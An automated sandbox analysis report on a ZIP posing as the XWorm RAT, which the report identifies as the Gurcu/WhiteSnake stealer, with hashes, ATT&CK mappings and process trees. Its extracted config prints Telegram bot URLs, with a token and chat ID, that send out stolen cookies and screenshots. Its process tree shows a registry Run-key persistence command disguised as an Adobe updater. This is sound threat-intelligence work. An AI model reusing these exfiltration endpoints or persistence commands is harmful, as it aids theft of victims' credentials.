gurcu | f8116c0ad6fc5f179db3e2c7edb11b32a298518c5689ac5ce5c4c4d479378e24

Analysis

max time kernel
63s
max time network
67s
platform
windows11-21h2_x64
resource
win11-20241023-en
resource tags

arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system
submitted
08-12-2024 18:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XWorm-RAT-main.zip
Size

34.0MB
MD5

73259646fef5e8c7764d456f13dfb8f0
SHA1

10cf75a60e41609d5607dc739f572c7d44af3cad
SHA256

f8116c0ad6fc5f179db3e2c7edb11b32a298518c5689ac5ce5c4c4d479378e24
SHA512

6d77aef87298f6885ce78eb2fb218e6c8a28a8bb2e9f13eb4cda58770f807e03d843f7ad108d789b17a9f569f59ef7044913db5ff9f74f3c026adcd79968f1b3
SSDEEP

786432:tiIKrjjUlNjsptclWQuDmDQXzTnHB35YnRBhWFIIZO:s509sUA/uWh35YnLhUu

Score

10^/10

gurcu agilenet discovery persistence spyware stealer

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=2024893777&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendMessage?chat_id=2024893777

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/getUpdates?offset=-

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=2024893777&caption=%F0%9F%93%B8Screenshot%20take

Signatures

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu

Executes dropped EXE 10 IoCs

pid	Process
2996	XWorm RAT V2.1.exe
840	Command Reciever.exe
956	Command Reciever.exe
1148	XHVNC.exe
3560	conhost.exe
2884	Command Reciever.exe
2828	XWorm RAT V2.1.exe
544	Command Reciever.exe
3824	Command Reciever.exe
1740	conhost.exe

Loads dropped DLL 7 IoCs

pid	Process
956	Command Reciever.exe
1148	XHVNC.exe
1148	XHVNC.exe
1148	XHVNC.exe
3560	conhost.exe
3824	Command Reciever.exe
1740	conhost.exe

Obfuscated with Agile.Net obfuscator 2 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral1/files/0x001900000002ab11-180.dat	agile_net
behavioral1/memory/1148-183-0x00000000069B0000-0x0000000006BD4000-memory.dmp	agile_net

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\AdobeUpdater\\conhost.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
11	raw.githubusercontent.com
13	raw.githubusercontent.com
1	raw.githubusercontent.com
4	raw.githubusercontent.com
6	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
3740	tasklist.exe
1036	tasklist.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XWorm RAT V2.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Command Reciever.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XWorm RAT V2.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Command Reciever.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XHVNC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Command Reciever.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	conhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	conhost.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Command Reciever.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Command Reciever.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Command Reciever.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Command Reciever.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
3120	timeout.exe
4320	timeout.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2944	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
956	Command Reciever.exe
956	Command Reciever.exe
956	Command Reciever.exe
956	Command Reciever.exe
956	Command Reciever.exe
956	Command Reciever.exe
956	Command Reciever.exe
956	Command Reciever.exe
956	Command Reciever.exe
956	Command Reciever.exe
956	Command Reciever.exe
956	Command Reciever.exe
956	Command Reciever.exe
956	Command Reciever.exe
956	Command Reciever.exe
956	Command Reciever.exe
956	Command Reciever.exe
956	Command Reciever.exe
956	Command Reciever.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3560	conhost.exe
3824	Command Reciever.exe
3824	Command Reciever.exe
3824	Command Reciever.exe
3824	Command Reciever.exe
3824	Command Reciever.exe
3824	Command Reciever.exe
3824	Command Reciever.exe
3824	Command Reciever.exe
3824	Command Reciever.exe
3824	Command Reciever.exe
3824	Command Reciever.exe
3824	Command Reciever.exe
3824	Command Reciever.exe
3824	Command Reciever.exe
3824	Command Reciever.exe
3824	Command Reciever.exe
3824	Command Reciever.exe
3824	Command Reciever.exe
3824	Command Reciever.exe
3560	conhost.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeRestorePrivilege	1916	7zFM.exe
Token: 35	1916	7zFM.exe
Token: SeSecurityPrivilege	1916	7zFM.exe
Token: SeDebugPrivilege	956	Command Reciever.exe
Token: SeDebugPrivilege	3740	tasklist.exe
Token: SeDebugPrivilege	3560	conhost.exe
Token: SeDebugPrivilege	3824	Command Reciever.exe
Token: SeDebugPrivilege	1036	tasklist.exe
Token: SeDebugPrivilege	1740	conhost.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
1916	7zFM.exe
1916	7zFM.exe
544	Command Reciever.exe
2884	Command Reciever.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
544	Command Reciever.exe
2884	Command Reciever.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1148	XHVNC.exe
1148	XHVNC.exe
3560	conhost.exe

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 2996 wrote to memory of 840	2996	XWorm RAT V2.1.exe	85
PID 2996 wrote to memory of 840	2996	XWorm RAT V2.1.exe	85
PID 2996 wrote to memory of 840	2996	XWorm RAT V2.1.exe	85
PID 2996 wrote to memory of 956	2996	XWorm RAT V2.1.exe	86
PID 2996 wrote to memory of 956	2996	XWorm RAT V2.1.exe	86
PID 956 wrote to memory of 4604	956	Command Reciever.exe	89
PID 956 wrote to memory of 4604	956	Command Reciever.exe	89
PID 4604 wrote to memory of 3104	4604	cmd.exe	91
PID 4604 wrote to memory of 3104	4604	cmd.exe	91
PID 4604 wrote to memory of 3740	4604	cmd.exe	92
PID 4604 wrote to memory of 3740	4604	cmd.exe	92
PID 4604 wrote to memory of 4136	4604	cmd.exe	93
PID 4604 wrote to memory of 4136	4604	cmd.exe	93
PID 4604 wrote to memory of 3120	4604	cmd.exe	94
PID 4604 wrote to memory of 3120	4604	cmd.exe	94
PID 4604 wrote to memory of 3560	4604	cmd.exe	95
PID 4604 wrote to memory of 3560	4604	cmd.exe	95
PID 3560 wrote to memory of 3124	3560	conhost.exe	96
PID 3560 wrote to memory of 3124	3560	conhost.exe	96
PID 3124 wrote to memory of 2944	3124	cmd.exe	98
PID 3124 wrote to memory of 2944	3124	cmd.exe	98
PID 2828 wrote to memory of 544	2828	XWorm RAT V2.1.exe	101
PID 2828 wrote to memory of 544	2828	XWorm RAT V2.1.exe	101
PID 2828 wrote to memory of 544	2828	XWorm RAT V2.1.exe	101
PID 2828 wrote to memory of 3824	2828	XWorm RAT V2.1.exe	102
PID 2828 wrote to memory of 3824	2828	XWorm RAT V2.1.exe	102
PID 3824 wrote to memory of 3504	3824	Command Reciever.exe	103
PID 3824 wrote to memory of 3504	3824	Command Reciever.exe	103
PID 3504 wrote to memory of 1088	3504	cmd.exe	105
PID 3504 wrote to memory of 1088	3504	cmd.exe	105
PID 3504 wrote to memory of 1036	3504	cmd.exe	106
PID 3504 wrote to memory of 1036	3504	cmd.exe	106
PID 3504 wrote to memory of 2064	3504	cmd.exe	107
PID 3504 wrote to memory of 2064	3504	cmd.exe	107
PID 3504 wrote to memory of 4320	3504	cmd.exe	108
PID 3504 wrote to memory of 4320	3504	cmd.exe	108
PID 3504 wrote to memory of 1740	3504	cmd.exe	109
PID 3504 wrote to memory of 1740	3504	cmd.exe	109

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\XWorm-RAT-main.zip"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1916

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1884

C:\Users\Admin\Desktop\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe
"C:\Users\Admin\Desktop\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2996
- C:\Users\Admin\Desktop\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe
  "C:\Users\Admin\Desktop\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:840
- C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe
  "C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:956
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpF608.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpF608.tmp.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4604
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:3104
  - - C:\Windows\system32\tasklist.exe
      Tasklist /fi "PID eq 956"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3740
  - - C:\Windows\system32\find.exe
      find ":"
      4⤵
      PID:4136
  - - C:\Windows\system32\timeout.exe
      Timeout /T 1 /Nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3120
  - - C:\Users\Admin\AppData\Roaming\AdobeUpdater\conhost.exe
      "C:\Users\Admin\AppData\Roaming\AdobeUpdater\conhost.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3560
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AdobeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdater\conhost.exe /f
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3124
      - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AdobeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdater\conhost.exe /f
        6⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2944

C:\Users\Admin\Desktop\XWorm-RAT-main\XWorm RAT V2.1\XHVNC.exe
"C:\Users\Admin\Desktop\XWorm-RAT-main\XWorm RAT V2.1\XHVNC.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1148

C:\Users\Admin\Desktop\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe
"C:\Users\Admin\Desktop\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2884

C:\Users\Admin\Desktop\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe
"C:\Users\Admin\Desktop\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2828
- C:\Users\Admin\Desktop\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe
  "C:\Users\Admin\Desktop\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:544
- C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe
  "C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3824
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp369B.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp369B.tmp.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3504
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:1088
  - - C:\Windows\system32\tasklist.exe
      Tasklist /fi "PID eq 3824"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1036
  - - C:\Windows\system32\find.exe
      find ":"
      4⤵
      PID:2064
  - - C:\Windows\system32\timeout.exe
      Timeout /T 1 /Nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4320
  - - C:\Users\Admin\AppData\Roaming\AdobeUpdater\conhost.exe
      "C:\Users\Admin\AppData\Roaming\AdobeUpdater\conhost.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:1740

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2316

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Command Reciever.exe.log

Filesize
1KB

MD5
066750c908c8b4574037a8abbaf7a908

SHA1
7157056e323a04bb9d41a8844f5c8521b0a44370

SHA256
707435d70f90895e753e19a79eede1d892018688cf3fc9d824ccec2ca6415a2e

SHA512
917818682c772b8cd07de5aee2a33b3a3b106e241215a99612de742c41cc09873242e0a56460da52d99304e6b8e7c38eafa872b6e985bc6a3a47c04843127475

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Command Reciever.exe.log

Filesize
1KB

MD5
52d3b03166ff6175e6decced1fdbe1ac

SHA1
aebf70297042aac16a899722b65074ce657a5c1c

SHA256
a1d1050828b5d5058390b9233f231cf5fd869ee109cf459151f2ca1714b4c7ed

SHA512
df267c44c1c9d9c8d9670c241b717d49f891792be9daad62415ccb76cd358e13277d897c2ce4d08a8eb0c9946bce2ecc10b5867e3b94ffb1467cf3eaeb08c4e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XWorm RAT V2.1.exe.log

Filesize
321B

MD5
f806bfa68f99d4a19d806595611717b6

SHA1
e83964cc47b297499f0add7d54aa237450fa4744

SHA256
2d5ab2f4a9040dcf4444eee974461311f43e017406382778aa8c83a87c0c857a

SHA512
12e35d2c49733241638c073a64679458fc24a0d06b4db735a0e86883a06167021900b9b3aad8bbb2d6701b61a6d049cc9d02a17de98fd2b1a394b6fb27d86119

Download Submit
C:\Users\Admin\AppData\Local\Temp\1a5fdae6-8f46-4b8b-a738-d6572f690d43\AgileDotNetRT.dll

Filesize
94KB

MD5
14ff402962ad21b78ae0b4c43cd1f194

SHA1
f8a510eb26666e875a5bdd1cadad40602763ad72

SHA256
fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b

SHA512
daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

Filesize
1.7MB

MD5
65ccd6ecb99899083d43f7c24eb8f869

SHA1
27037a9470cc5ed177c0b6688495f3a51996a023

SHA256
aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

SHA512
533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp369B.tmp.bat

Filesize
269B

MD5
bacd8b37b36a1a02b4c690f808e8c3af

SHA1
829fba405e030a793a39a4bf5e1c79c254d3b151

SHA256
c625dc760163d88366243ee59013630f36b3ea0ec417c62e642afc8d22da3445

SHA512
058d3d6e00ec34ca70467b95c656768b4caf766cc78f51bcc718d766b5c66de2cd0ef4687df8b52ecbd98cbbe1c7d7cdc2b52a5b6bfc016bb4585be563287560

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF608.tmp.bat

Filesize
268B

MD5
be6f4b1e51bea9aa22ded133ddb70390

SHA1
649b24756f29eab3dc25cf0f216cb7b194266d3e

SHA256
5317e5ebee05c1e10645f134b98cec832d2f70fedb998ba21dd8c99b5a9c8427

SHA512
a82aa9b9866b79d5a5a517d75db01a61cdbc5ff061cc04dbd6fe37046cf8194028dfc1b74a8aef6a1328e05742c0b0eca3bff4adb8ebf117a87d0f9864a56e06

Download Submit
C:\Users\Admin\Desktop\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe

Filesize
6.5MB

MD5
a21db5b6e09c3ec82f048fd7f1c4bb3a

SHA1
e7ffb13176d60b79d0b3f60eaea641827f30df64

SHA256
67d9b4b35c02a19ab364ad19e1972645eb98e24dcd6f1715d2a26229deb2ccf5

SHA512
7caab4f21c33ef90c1104aa7256504ee40ff0a36525b15eb3d48940862346ccf90a16eef87c06d79b0ffd920beb103ed380eae45df8c9286768890b15ed1067c

Download Submit
C:\Users\Admin\Desktop\XWorm-RAT-main\XWorm RAT V2.1\GeoIP.dat

Filesize
1.0MB

MD5
c8db63170e85b35ce51b5d1aef098708

SHA1
bd8489cc9017bfe308d748b1d62db1f154990acc

SHA256
6c15c5f8e3faec8adf4321fd8f9d62f3f4dd645dafd0f9f6c52b118001654d36

SHA512
4392ec79c297da34b1500799bd07eebbf1ca88b5d1efe80d9cf02d4cd9562ae617854d228876451aa53c5256f9a47b530f481da4cedb4d748b319d69a14e3a7b

Download Submit
C:\Users\Admin\Desktop\XWorm-RAT-main\XWorm RAT V2.1\Guna.UI2.dll

Filesize
2.1MB

MD5
d65fd6dbbd3c9ac74139aeaedc4a5816

SHA1
407ae10ccc8e19798bf75cb90b2150cb63a9db66

SHA256
84199a22c8669a39800272c3da0d969ec4e8d77d67b9d324ca049953a5042c71

SHA512
b8a99e88d49a6f9ff89339fa5acc9df8b59665d2ec22ccb4741e501bba6b280b00336906a637d8f071f86a4dcd68ca4ac86683e651466f084cb96d0e3152eddf

Download Submit
C:\Users\Admin\Desktop\XWorm-RAT-main\XWorm RAT V2.1\Resource\data.dat

Filesize
5.6MB

MD5
d650ccbec4cef66b790c0adbd0c690ed

SHA1
7c5323641a28170edb3121d9ad15d7bf643d801d

SHA256
b8735a6c2caa10ed5e886a60be7f2a1edb55e5d26d60b24d24af5613a8a0e474

SHA512
332dc8e1b3952ac3b3fbcfdf1634eaf9720d6bd85e6a1f0baef0f095c97a98d288f301b774c4d041c45ea8ea5ed8e52e8d786a874b8d0ce41dd5dd25a961b535

Download Submit
C:\Users\Admin\Desktop\XWorm-RAT-main\XWorm RAT V2.1\XHVNC.exe

Filesize
1.9MB

MD5
4904329d091687c9deb08d9bd7282e77

SHA1
bcf7fcebb52cad605cb4de65bdd077e600475cc7

SHA256
e92707537fe99713752f3d3f479fa68a0c8dd80439c13a2bb4ebb36a952b63fd

SHA512
b7ba131e9959f2f76aa3008711db9e6f2c4753a232140368be5c8388ab0e25154a31e579ef87fe01a3e4bc83402170bb9fbf242c6f01528455246b793e03fdfb

Download Submit
C:\Users\Admin\Desktop\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe

Filesize
2.2MB

MD5
835f081566e31c989b525bccb943569c

SHA1
71d04e0a86ce9585e5b7a058beb0a43cf156a332

SHA256
ea9258e9975b8925a739066221d996aef19b4ef4f4c91524f82e39d403f25579

SHA512
9ec58f8c586ecf78ef8d75debc5dba58544558566423a634724bb5ab192aaf64f9ccbee9a5af48124a3366b2a7d24b4db71bb5743978201b881c08bad8f6fb0c

Download Submit
memory/840-168-0x0000000005FD0000-0x0000000005FDA000-memory.dmp

Filesize
40KB

Download
memory/840-169-0x0000000006100000-0x0000000006156000-memory.dmp

Filesize
344KB

Download
memory/840-172-0x0000000009390000-0x00000000093F6000-memory.dmp

Filesize
408KB

Download
memory/840-161-0x0000000006060000-0x00000000060F2000-memory.dmp

Filesize
584KB

Download
memory/840-158-0x0000000005EE0000-0x0000000005F7C000-memory.dmp

Filesize
624KB

Download
memory/840-154-0x0000000000F30000-0x00000000015C2000-memory.dmp

Filesize
6.6MB

Download
memory/956-167-0x00000172B97F0000-0x00000172B9866000-memory.dmp

Filesize
472KB

Download
memory/956-170-0x00000172B9720000-0x00000172B973E000-memory.dmp

Filesize
120KB

Download
memory/956-171-0x00000172B9740000-0x00000172B974A000-memory.dmp

Filesize
40KB

Download
memory/956-160-0x000001729ED20000-0x000001729F2C2000-memory.dmp

Filesize
5.6MB

Download
memory/1148-175-0x0000000000B80000-0x0000000000D6A000-memory.dmp

Filesize
1.9MB

Download
memory/1148-191-0x0000000073580000-0x000000007360A000-memory.dmp

Filesize
552KB

Download
memory/1148-183-0x00000000069B0000-0x0000000006BD4000-memory.dmp

Filesize
2.1MB

Download
memory/2996-140-0x0000000074B8E000-0x0000000074B8F000-memory.dmp

Filesize
4KB

Download
memory/2996-141-0x0000000000040000-0x0000000000282000-memory.dmp

Filesize
2.3MB

Download
memory/2996-142-0x0000000005260000-0x0000000005806000-memory.dmp

Filesize
5.6MB

Download
memory/3560-202-0x0000022A35FC0000-0x0000022A35FE2000-memory.dmp

Filesize
136KB

Download
memory/3560-206-0x0000022A36D00000-0x0000022A3702E000-memory.dmp

Filesize
3.2MB

Download
memory/3560-225-0x0000022A360B0000-0x0000022A360C2000-memory.dmp

Filesize
72KB

Download
memory/3560-205-0x0000022A35FF0000-0x0000022A36016000-memory.dmp

Filesize
152KB

Download
memory/3560-204-0x0000022A36030000-0x0000022A3606A000-memory.dmp

Filesize
232KB

Download
memory/3560-198-0x0000022A35E00000-0x0000022A35E6A000-memory.dmp

Filesize
424KB

Download
memory/3560-201-0x0000022A35F70000-0x0000022A35FC0000-memory.dmp

Filesize
320KB

Download
memory/3560-200-0x0000022A35E70000-0x0000022A35F22000-memory.dmp

Filesize
712KB

Download